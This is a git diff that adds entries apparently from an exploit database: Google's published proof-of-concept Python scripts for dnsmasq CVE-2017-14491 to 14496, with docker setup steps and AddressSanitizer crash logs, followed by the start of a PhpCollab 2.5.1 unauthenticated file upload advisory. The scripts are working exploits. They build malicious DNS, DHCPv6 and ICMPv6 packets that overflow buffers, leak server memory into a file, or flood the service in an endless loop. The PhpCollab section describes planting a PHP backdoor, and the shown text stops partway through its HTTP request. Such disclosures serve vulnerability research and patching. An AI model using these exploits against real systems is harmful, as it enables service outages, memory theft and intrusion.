+  0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==1159==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwind <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+
+import socket
+import struct
+import sys
+
+def dw(x):
+  return struct.pack('>H', x)
+
+def udp_handler(sock_udp):
+
+  data, addr = sock_udp.recvfrom(1024)
+  print '[UDP] Total Data len recv ' + str(len(data))
+  id = struct.unpack('>H', data[0:2])[0]
+  query = data[12:]
+
+  data = dw(id)                        # id
+  data += dw(0x85a0)                   # flags
+  data += dw(1)                        # questions
+  data += dw(0x52)                     # answers
+  data += dw(0)                        # authoritative
+  data += dw(0)                        # additional
+
+  # Add the question back - we're just hardcoding it
+  data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
+           '\x00\x0c' + # type = 'PTR'
+           '\x00\x01')   # cls = 'IN'
+
+  # Add the first answer
+  data += ('\xc0\x0c' + # ptr to the name
+           '\x00\x0c' + # type = 'PTR'
+           '\x00\x01' + # cls = 'IN'
+           '\x00\x00\x00\x3d' + # ttl
+           '\x04\x00' + # size of this resource record
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x3e' + 'Z'*62 +
+           '\x0e' + 'Z'*14 +
+           '\x00')
+
+  # Add the next answer, which is written out in full
+  data += ('\xc0\x0c' + # ptr to the name
+           '\x00\x0c' + # type = 'PTR'
+           '\x00\x01' + # cls = 'IN'
+           '\x00\x00\x00\x3d' + # ttl
+           '\x00\x26' + # size of this resource record
+           '\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
+
+  for _ in range(79):
+    data += ('\xc0\x0c' + # ptr to the name
+             '\x00\x0c' + # type = 'PTR'
+             '\x00\x01' + # cls = 'IN'
+             '\x00\x00\x00\x3d' + # ttl
+             '\x00\x02' + # size of the compressed resource record
+             '\xc4\x40')   # pointer to the second record's name
+
+  data += ('\xc0\x0c' + # ptr to the name
+           '\x00\x0c' + # type = 'PTR'
+           '\x00\x01' + # cls = 'IN'
+           '\x00\x00\x00\x3d' + # ttl
+           '\x00\x11' + # size of this resource record
+           '\x04EEEE\x09DAABBEEEE\xc4\x49')
+
+  sock_udp.sendto(data, addr)
+
+if __name__ == '__main__':
+
+  if len(sys.argv) != 3:
+    print 'Usage: %s <ip> <port>\n' % sys.argv[0]
+    sys.exit(0)
+
+  ip = sys.argv[1]
+  port = int(sys.argv[2])
+
+  sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+  sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+  sock_udp.bind((ip, port))
+  print 'Listening at %s:%d\n' % (ip, port)
+
+  while True:
+    udp_handler(sock_udp)
+
+  sock_udp.close()
diff --git a/platforms/multiple/dos/42942.py b/platforms/multiple/dos/42942.py
new file mode 100755
index 000000000..0d01bc7c0
--- /dev/null
+++ b/platforms/multiple/dos/42942.py
@@ -0,0 +1,145 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open two terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it <container_id> bash
+
+2) On one terminal start dnsmasq:
+
+# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
+dnsmasq-dhcp: router advertisement on fd00::
+dnsmasq-dhcp: IPv6 router advertisement enabled
+dnsmasq: reading /etc/resolv.conf
+dnsmasq: using nameserver 8.8.8.8#53
+dnsmasq: using nameserver 8.8.4.4#53
+dnsmasq: read /etc/hosts - 7 addresses
+
+
+3) On another terminal start the PoC:
+
+# python /poc.py ::1 547
+[+] sending 2050 bytes to ::1
+
+4) Dnsmasq will output the following: Segmentation fault (core dumped)
+
+==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
+WRITE of size 4 at 0x61900000ea81 thread T0
+    #0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
+    #1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
+    #2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
+    #3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
+    #4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
+    #5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
+allocated by thread T0 here:
+    #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+    #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+    #2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
+    #3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
+    #4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
+Shadow bytes around the buggy address:
+  0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==556==ABORTING
+'''
+
+#!/usr/bin/env python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwind <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+
+from struct import pack
+import socket
+import sys
+
+ND_ROUTER_SOLICIT = 133
+ICMP6_OPT_SOURCE_MAC = 1
+
+def u8(x):
+    return pack("B", x)
+
+def send_packet(data, host):
+    print("[+] sending {} bytes to {}".format(len(data), host))
+    s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+
+    if s.sendto(data, (host, 0)) != len(data):
+        print("[!] Could not send (full) payload")
+    s.close()
+
+if __name__ == '__main__':
+    assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
+    host, = sys.argv[1:]
+    pkg = b"".join([
+        u8(ND_ROUTER_SOLICIT),    # type
+        u8(0),                    # code
+        b"X" * 2,                 # checksum
+        b"\x00" * 4,              # reserved
+        u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
+        u8(255),                  # Have 255 MACs!
+        b"A" * 255 * 8,
+    ])
+
+    send_packet(pkg, host)
diff --git a/platforms/multiple/dos/42943.py b/platforms/multiple/dos/42943.py
new file mode 100755
index 000000000..b58e62513
--- /dev/null
+++ b/platforms/multiple/dos/42943.py
@@ -0,0 +1,151 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open two terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it <container_id> bash
+
+2) On one terminal start dnsmasq:
+
+# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
+dnsmasq: reading /etc/resolv.conf
+dnsmasq: using nameserver 8.8.8.8#53
+dnsmasq: using nameserver 8.8.4.4#53
+dnsmasq: read /etc/hosts - 7 addresses
+
+
+3) On another terminal start the PoC:
+
+# python /poc.py ::1 547
+[+] sending 70 bytes to ::1:547
+
+4) Dnsmasq will output the following: Segmentation fault (core dumped)
+
+==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
+WRITE of size 30 at 0x7ffcbef81470 thread T0
+    #0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
+    #1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
+    #2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
+    #3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
+    #4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
+    #5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
+    #0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
+
+  This frame has 1 object(s):
+    [32, 208) 'state' <== Memory access at offset 208 overflows this variable
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
+Shadow bytes around the buggy address:
+  0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
+  0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
+=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
+  0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
+  0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
+  0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
+  0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==33==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwind <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+
+from struct import pack
+import sys
+import socket
+
+def send_packet(data, host, port):
+    print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
+    s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+    if s.sendto(data, (host, port)) != len(data):
+        print("[!] Could not send (full) payload")
+    s.close()
+
+def u8(x):
+    return pack("B", x)
+
+def u16(x):
+    return pack("!H", x)
+
+def gen_option(option, data, length=None):
+    if length is None:
+        length = len(data)
+
+    return b"".join([
+        u16(option),
+        u16(length),
+        data
+    ])
+
+if __name__ == '__main__':
+    assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
+    pkg = b"".join([
+        u8(12),                         # DHCP6RELAYFORW
+        u16(0x0313), u8(0x37),          # transaction ID
+        b"_" * (34 - 4),
+        # Option 79 = OPTION6_CLIENT_MAC
+        # Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
+        gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
+    ])
+
+    host, port = sys.argv[1:]
+    send_packet(pkg, host, int(port))
diff --git a/platforms/multiple/dos/42944.py b/platforms/multiple/dos/42944.py
new file mode 100755
index 000000000..8bc2b2228
--- /dev/null
+++ b/platforms/multiple/dos/42944.py
@@ -0,0 +1,108 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+Sadly, there are no easy docker setup instructions available.
+
+Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
+# python /poc.py  <ipv6 addr> <server id, hexencoded>
+The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
+
+'''
+
+#!/usr/bin/env python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwind <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+from binascii import unhexlify
+from struct import pack
+import socket
+import sys
+
+# num bytes to leak. < 0xFFFF, exact upper limit not tested.
+N_BYTES = 0x8000
+
+def send_packet(data, host, port):
+    print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
+    s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
+    if s.sendto(data, (host, port)) != len(data):
+        print("[!] Could not send (full) payload")
+
+    s.close()
+
+def u8(x):
+    return pack("B", x)
+
+def u16(x):
+    return pack("!H", x)
+
+def gen_option(option, data, length=None):
+    if length is None:
+        length = len(data)
+
+    return b"".join([
+        u16(option),
+        u16(length),
+        data
+    ])
+
+def inner_pkg(duid):
+    OPTION6_SERVER_ID = 2
+    return b"".join([
+        u8(5),            # Type = DHCP6RENEW
+        u8(0), u16(1337), # ID
+        gen_option(OPTION6_SERVER_ID, duid),
+        gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
+    ])
+
+if __name__ == '__main__':
+    assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
+    # No automated way to obtain a duid, sorry. Not a programming contest after all.
+    host, duid = sys.argv[1:]
+    duid = unhexlify(duid)
+    assert len(duid) == 14
+    pkg = b"".join([
+        u8(12),                         # DHCP6RELAYFORW
+        '?',
+        # Client addr
+        '\xFD\x00',
+        '\x00\x00' * 6,
+        '\x00\x05',
+        '_' * (33 - 17), # Skip random data.
+        # Option 9 - OPTION6_RELAY_MSG
+        gen_option(9, inner_pkg(duid), length=N_BYTES),
+    ])
+
+    # Setup receiving port
+    s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
+    s.bind(('::', 547))
+
+    # Send request
+    send_packet(pkg, host, 547)
+
+    # Dump response
+    with open('response.bin', 'wb') as f:
+        f.write(s.recvfrom(N_BYTES)[0])
diff --git a/platforms/multiple/dos/42945.py b/platforms/multiple/dos/42945.py
new file mode 100755
index 000000000..1dead3cfa
--- /dev/null
+++ b/platforms/multiple/dos/42945.py
@@ -0,0 +1,61 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
+
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwin <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+
+import socket
+import sys
+
+
+def oom():
+  data = '''01 0d 08 1b 00 01 00 00  00 00 00 02 00 00 29 04
+00 00 29 00 00 00 03 00  00 01 13 00 08 01 13 79
+00 00 00 00 00
+  '''.replace(' ', '').replace('\n', '').decode('hex')
+  data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
+  return data
+
+if __name__ == '__main__':
+  if len(sys.argv) != 3:
+    print 'Usage: %s <ip> <port>' % sys.argv[0]
+    sys.exit(0)
+
+  ip = sys.argv[1]
+  port = int(sys.argv[2])
+
+  packet = oom()
+
+  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+  s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
+  while True:
+    s.sendto(packet, (ip, port))
+    #break
+  s.close()
diff --git a/platforms/multiple/dos/42946.py b/platforms/multiple/dos/42946.py
new file mode 100755
index 000000000..b8bb4de93
--- /dev/null
+++ b/platforms/multiple/dos/42946.py
@@ -0,0 +1,99 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
+
+=================================================================
+==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
+    #0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
+    #1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
+    #2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
+    #3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
+    #4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
+    #5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
+    #6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
+    #7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
+allocated by thread T0 here:
+    #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+    #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+    #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
+    #3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
+==2215==ABORTING
+'''
+
+#!/usr/bin/python
+#
+# Copyright 2017 Google Inc
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Authors:
+#  Fermin J. Serna <fjserna@google.com>
+#  Felix Wilhelm <fwilhelm@google.com>
+#  Gabriel Campana <gbrl@google.com>
+#  Kevin Hamacher <hamacher@google.com>
+#  Gynvael Coldwin <gynvael@google.com>
+#  Ron Bowes - Xoogler :/
+
+import socket
+import sys
+
+def negative_size_param():
+  data = '''00 00 00 00  00 00 00 00 00 00 00 04
+00 00 29 00 00 3a 00 00  00 01 13 fe 32 01 13 79
+00 00 00 00 00 00 00 01  00 00 00 61 00 08 08 08
+08 08 08 08 08 08 08 08  08 08 08 00 00 00 00 00
+00 00 00 6f 29 fb ff ff  ff 00 00 00 00 00 00 00
+00 00 03 00 00 00 00 00  00 00 00 02 8d 00 00 00
+f9 00 00 00 00 00 00 00  00 00 00 00 5c 00 00 00
+01 ff ff 00 35 13 01 0d  06 1b 00 00 00 00 00 00
+00 00 00 00 00 04 00 00  29 00 00 3a 00 00 00 01
+13 00 08 01 00 00 00 00  00 00 01 00 00 00 61 00
+08 08 08 08 08 08 08 08  08 13 08 08 08 00 00 00
+00 00 00 00 00 00 6f 29  fb ff ff ff 00 29 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 02 8d 00 00 00 f9  00 00 00 00 00 00 00 00
+00 00 00 00 00 01 00 00  00 00 00 00 01 ff ff 00
+35 13 00 00 00 00 00 b6  00 00 13 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
+00 00 00 00 00 00 00 00  00 00 00 00 00 00 61 05
+01 20 00 01
+'''.replace(' ', '').replace('\n', '').decode('hex')
+  return data
+
+if __name__ == '__main__':
+  if len(sys.argv) != 3:
+    print 'Usage: %s <ip> <port>' % sys.argv[0]
+    sys.exit(0)
+
+  ip = sys.argv[1]
+  port = int(sys.argv[2])
+
+  packet = negative_size_param()
+
+  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+  s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
+  s.sendto(packet, (ip, port))
+  s.close()
diff --git a/platforms/php/webapps/42934.txt b/platforms/php/webapps/42934.txt
new file mode 100755
index 000000000..c2bf6f82b
--- /dev/null
+++ b/platforms/php/webapps/42934.txt
@@ -0,0 +1,123 @@
+# [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
+
+## Description
+
+PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
+
+## Arbitrary File Upload
+
+The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
+
+**CVE ID**: CVE-2017-6090
+
+**Access Vector**: remote
+
+**Security Risk**: Critical
+
+**Vulnerability**: CWE-434
+
+**CVSS Base Score**: 10 (Critical)
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept
+
+The following HTTP request allows an attacker to upload a malicious php file, without authentication.
+Thus, a file named after `$id.extension` is created.
+
+For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
+
+```
+POST /clients/editclient.php?id=1&action=update HTTP/1.1
+Host: phpCollab.lan
